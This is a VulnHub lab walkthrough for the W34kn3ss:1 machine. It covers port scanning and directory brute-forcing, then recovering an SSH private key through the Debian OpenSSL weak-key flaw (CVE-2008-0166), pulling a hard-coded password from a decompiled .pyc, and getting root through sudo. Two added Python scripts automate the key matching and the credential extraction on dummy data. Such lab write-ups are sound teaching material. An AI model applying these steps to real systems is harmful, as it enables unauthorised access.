W34kn3ss:1 VulnHub walkthrough
Hello friends. Today I will share with you another write-up for a VulnHub vulnerable machine. The selected target is W34kn3ss:1. You can download it from the following link: https://download.vulnhub.com/w34kn3ss/W34KN3SS.ova
In this article you will learn the following:
- Using nmap to find open ports and running services.
- Reading the SSL/TLS certificate to find the domain name(s) tied to the host.
- Editing the hosts file (local domain lookup).
- Brute-forcing web directories with dirb.
- Searching for public exploits with searchsploit.
- Logging in over SSH with a recovered private key.
- Decompiling a compiled Python bytecode (.pyc) file.
- Getting root with sudo.
After downloading the OVA file and importing it into your virtualization software, power it on and start hacking.
The first thing to do is to find the IP address of the target with an nmap ping scan (-sn) over the whole subnet. This gives the IP address 10.0.2.19.
Next, I scanned that IP address for all open ports and running services. Only three ports are open: 22 (SSH), 80 (HTTP) and 443 (HTTPS).
I checked port 80 in Firefox and found only the default Apache page; there is no robots.txt either. So I moved on to port 443 (HTTPS). Looking at the SSL certificate the server presents (in the browser's certificate viewer, or with openssl s_client) shows it was issued for the domain weakness.htb. So I added the IP address and the domain (10.0.2.19 weakness.htb) to my hosts file in Kali Linux, so that the browser and my tools resolve the name and send it as the Host header.
I then browsed weakness.htb on port 80 (HTTP) but found nothing new, so I brute-forced directories with dirb using its default wordlist. It found a directory called Private.
Browsing that directory shows two files: mykey.pub and notes.txt.
mykey.pub is an SSH public key; to log in over SSH we need the matching private key, so I checked the second file. notes.txt contains a hint: the key was generated with OpenSSL version 0.9.8c-1. That package version is the Debian build that introduced the broken PRNG patch (CVE-2008-0166): OpenSSL on Debian and its derivatives seeded its random number generator with little more than the process ID, so every key those versions generated comes from a small, enumerable set.
Searching with searchsploit confirms that this version of OpenSSL is vulnerable and that a public exploit exists for it: a brute-force script that works from a tarball of all the key pairs the broken generator can produce.
I did not follow all the steps in that exploit, only the first two: download the tarball of pre-generated keys and untar it.
Then I used grep to search the unpacked directory for the contents of mykey.pub (grep for the base64 body of the key rather than the whole line, since the trailing comment field in the leaked key need not match the archive's). The match is the file 4161de56829de2fe64b9055711f531c1-2537.pub. Every public key in the archive sits beside its private key under the same name without the .pub extension, so 4161de56829de2fe64b9055711f531c1-2537 is the private key that goes with mykey.pub.
I used that private key (with its permissions set to 600, otherwise ssh refuses to use it) to log in to the target over SSH as n30, and it worked. By the way, the username n30 was found while enumerating the web application.
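The grep step above works, but it is easy to get a false negative when the comment field differs or the key file is one long line. The script below is an added example, not code from the original write-up or from the exploit it references: it parses each .pub file as an OpenSSH key, compares the key material (type and base64 blob) only, and returns the sibling private key. It assumes the archive's naming convention described above (<name>.pub beside <name>); the key pairs it builds for the demo are constructed dummies, not real Debian weak keys.

```python
# Added example; not from the original write-up or the referenced exploit.
# Given a leaked OpenSSH public key (mykey.pub) and a directory of pre-generated
# weak key pairs, find the private key whose public half matches.
# Assumption (naming the write-up describes): each pair is <name>.pub beside <name>.
# make_pubkey_line() builds constructed dummy keys for the demo only.
import base64
import hashlib
import struct
import tempfile
from pathlib import Path


def parse_openssh_pubkey(line):
    """Split an 'ssh-rsa AAAA... comment' line into (keytype, blob bytes).

    Only the key type and the base64 blob are compared; the trailing comment
    is ignored because the leaked key and the archive copy share key
    material, not necessarily the comment."""
    parts = line.split()
    if len(parts) < 2:
        raise ValueError("not an OpenSSH public key line")
    keytype, blob = parts[0], base64.b64decode(parts[1], validate=True)
    # The wire blob begins with a length-prefixed copy of the key type.
    (tlen,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + tlen] != keytype.encode():
        raise ValueError("key type does not match blob")
    return keytype, blob


def fingerprint(blob):
    """SHA256 fingerprint in the format `ssh-keygen -lf -E sha256` prints."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def find_private_key(pub_path, key_dir):
    """Return the path of the private key matching pub_path, or None."""
    _, target = parse_openssh_pubkey(Path(pub_path).read_text())
    for candidate in sorted(Path(key_dir).glob("*.pub")):
        try:
            _, blob = parse_openssh_pubkey(candidate.read_text())
        except ValueError:
            continue  # not an OpenSSH key file; skip it
        if blob == target:
            private = candidate.with_suffix("")  # strip ".pub"
            return private if private.is_file() else None
    return None


def make_pubkey_line(e, n, comment):
    """Build a syntactically valid ssh-rsa line from integers (demo only)."""
    def mpint(v):
        raw = v.to_bytes((v.bit_length() + 8) // 8, "big")  # leading 0x00 keeps it positive
        return struct.pack(">I", len(raw)) + raw
    blob = struct.pack(">I", 7) + b"ssh-rsa" + mpint(e) + mpint(n)
    return "ssh-rsa " + base64.b64encode(blob).decode() + " " + comment


def demo():
    """Populate a throw-away key directory (constructed data) and run the search."""
    with tempfile.TemporaryDirectory() as tmp:
        keys = Path(tmp) / "rsa"
        keys.mkdir()
        pairs = {  # constructed sample archive: name -> (modulus, comment)
            "aaaa-1111": (0xDEADBEEF, "root@build"),
            "bbbb-2222": (0xC0FFEE1234567, "root@build"),
            "cccc-3333": (0xBADF00D, "root@build"),
        }
        for name, (n, comment) in pairs.items():
            (keys / (name + ".pub")).write_text(make_pubkey_line(65537, n, comment) + "\n")
            (keys / name).write_text("-----BEGIN RSA PRIVATE KEY-----\n%s\n"
                                     "-----END RSA PRIVATE KEY-----\n" % name)
        leaked = Path(tmp) / "mykey.pub"
        # Same key material as bbbb-2222 but a different comment, as on the box.
        leaked.write_text(make_pubkey_line(65537, 0xC0FFEE1234567, "n30@weakness") + "\n")
        match = find_private_key(leaked, keys)
        return match.name if match else None


if __name__ == "__main__":
    print("matching private key:", demo())
```

Once the private key is found, chmod it to 600 and log in with `ssh -i <key> n30@weakness.htb`. The fingerprint helper is there so you can confirm the match against `ssh-keygen -lf mykey.pub` before trying it.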
After reading user.txt, I noticed that n30's home directory contains an executable file called code. The strings command shows it is a byte-compiled Python file (a .pyc without the extension). There are many online services and offline tools (uncompyle6, for example) that can decompile it; the interpreter version it was compiled with has to match, which you can tell from the magic number in the file's first bytes. After decompiling it, I found that it contains the password for the n30 user.
With that password, sudo -l lists the commands n30 may run as root, and the answer is all of them, so sudo gives a root shell straight away.
I hope you enjoyed it and learned something new in the pen-testing field. If you have questions or comments, please write them below, and wait for the next write-up 😀
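When the decompilers refuse the file (wrong interpreter version, stripped header, obfuscated bytecode), the string literals are still sitting in the marshalled code object. The script below is an added example, not code from the original write-up: it reads a .pyc directly, checks the magic number, and walks the bytecode to recover every `name = "literal"` assignment, nested functions included, so a hard-coded credential can be spotted without a full decompile. It assumes the 16-byte .pyc header CPython has written since 3.7 (magic, flags, mtime, size) and that the file was compiled by the interpreter running the script; the sample module source is constructed for the demo.

```python
# Added example; not from the original write-up. Recovers string constants and
# "name = 'literal'" assignments from a CPython .pyc by reading the marshalled
# code object, so a hard-coded credential can be found without a decompiler.
# Assumptions: 16-byte header (CPython >= 3.7, PEP 552) and the same interpreter
# version that compiled the file. SAMPLE_SOURCE is constructed for the demo.
import dis
import importlib.util
import marshal
import struct
import tempfile
import types
from pathlib import Path

PYC_HEADER_LEN = 16  # magic (4) + flags (4) + source mtime (4) + source size (4)

SAMPLE_SOURCE = '''\
import hashlib
USER = "n30"

def check(candidate):
    password = "demo-only-password"   # constructed; not the box's real value
    digest = hashlib.md5(candidate.encode()).hexdigest()
    return digest == hashlib.md5(password.encode()).hexdigest()
'''


def write_pyc(source, path):
    """Compile source and write it in .pyc form (flags=0: timestamp-based pyc)."""
    code = compile(source, "code.py", "exec")
    header = importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, 0, len(source))
    Path(path).write_bytes(header + marshal.dumps(code))


def load_code(path):
    """Check the magic number, skip the header, unmarshal the code object."""
    data = Path(path).read_bytes()
    if data[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("magic %r belongs to another CPython version; run this "
                         "under the interpreter the file was compiled with" % data[:4])
    return marshal.loads(data[PYC_HEADER_LEN:])


def string_constants(code):
    """Every str constant in the code object and in nested functions/classes."""
    found = []
    for const in code.co_consts:
        if isinstance(const, str):
            found.append(const)
        elif isinstance(const, types.CodeType):
            found.extend(string_constants(const))
    return found


def assigned_strings(code):
    """Map variable name -> string literal for 'name = "..."' patterns.

    A LOAD_CONST of a str immediately followed by a STORE_* instruction is
    the compiled form of that assignment. Nested code objects are visited
    too, so function-local credentials are not missed."""
    result = {}
    pending = None
    for ins in dis.get_instructions(code):
        if ins.opname.startswith("LOAD_CONST") and isinstance(ins.argval, str):
            pending = ins.argval
            continue
        if pending is not None and ins.opname.startswith("STORE_"):
            # Fused store/load opcodes carry a tuple of names; take the stored one.
            name = ins.argval[0] if isinstance(ins.argval, tuple) else ins.argval
            result[name] = pending
        pending = None
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            result.update(assigned_strings(const))
    return result


def demo():
    """Write the sample module as an extension-less .pyc, then recover its literals."""
    with tempfile.TemporaryDirectory() as tmp:
        pyc = Path(tmp) / "code"  # no extension, like the file on the box
        write_pyc(SAMPLE_SOURCE, pyc)
        code = load_code(pyc)
        return assigned_strings(code), string_constants(code)


if __name__ == "__main__":
    assigned, consts = demo()
    for name, value in assigned.items():
        print("%s = %r" % (name, value))
```

If load_code() rejects the magic number, the first two bytes identify the CPython release that produced the file (the mapping lives in CPython's importlib source); run the script under that version, or hand the file to a decompiler such as uncompyle6 that targets it. The marshal format is not stable across releases, so guessing the version wastes time.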